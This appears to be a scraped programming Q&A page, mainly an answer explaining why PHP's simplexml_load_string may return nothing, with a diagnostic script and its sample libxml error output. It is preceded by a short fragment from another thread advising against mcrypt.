Without seeing what these functions do, this isn't helpful information, but mcrypt should be avoided. Use Libsodium (if you can; otherwise, use OpenSSL) instead.
My original string was cut short!
It probably treated the + as a space. Using urlencode() would fix one problem, but it wouldn't solve the vulnerability to chosen-ciphertext attacks that using mcrypt introduces into your application in the absence of a Message Authentication Code (MAC).

php xml function requirements

hi i am using the xml function simplexml_load_string for reading the xml string but there is no any output of this function i also use dom function but the same response of this.
is there any another method of reading the xml?
or is there any modification require on server to enable these function

There are are many reasons why you might end up with no output at all. Some I can think of are:
There's a parse error in your script and your php version is not configured to show startup errors. see display_startup_errors and/or add some unconditional output to the script (so that if this output is missing you know the script didn't even reach that statement).
The script doesn't reach the statement because of some conditions ( `if (false) { ... } ). Again add some output and/or use a debugger to see if the statement is reached.
The string contains something that is not valid xml and therefore the libxml parser gives up and simplexml_load_string() returns false. Test the return value and maybe check the errors libxml may have encountered, see http://docs.php.net/function.libxml-use-internal-errors
The SimpleXML module isn't present (though in recent versions of php it's enabled by default). Use extension_loaded() and/or function_exists() to test this.
Try it again with a bit more error handling, e.g.
<?php
// this is only for testing purposes
// set those values in the php.ini of your development server if you like
// but use a slightly more sophisticated error handling/reporting mechanism in production code.
error_reporting(E_ALL); ini_set('display_errors', 1);
echo 'php version: ', phpversion(), "\n";
echo 'simplexml_load_string() : ', function_exists('simplexml_load_string') ? 'exists':"doesn't exist", "\n";
$xml = '<a>
>lalala
</b>
</a>';
libxml_use_internal_errors(true);
$doc = simplexml_load_string($xml);
echo 'errors: ';
foreach( libxml_get_errors() as $err ) {
var_dump($err);
}
if ( !is_object($doc) ) {
var_dump($doc);
}
echo 'done.';
should print something like
php version: 5.3.2
simplexml_load_string() : exists
errors: object(LibXMLError)#1 (6) {
["level"]=>
int(3)
["code"]=>
int(76)
["column"]=>
int(7)
["message"]=>
string(48) "Opening and ending tag mismatch: a line 1 and b
"
["file"]=>
string(0) ""
["line"]=>
int(3)
}
object(LibXMLError)#2 (6) {
["level"]=>
int(3)
["code"]=>
int(5)
["column"]=>
int(1)
["message"]=>
string(41) "Extra content at the end of the document
"
["file"]=>
string(0) ""
["line"]=>
int(4)
}
bool(false)
done.

Categories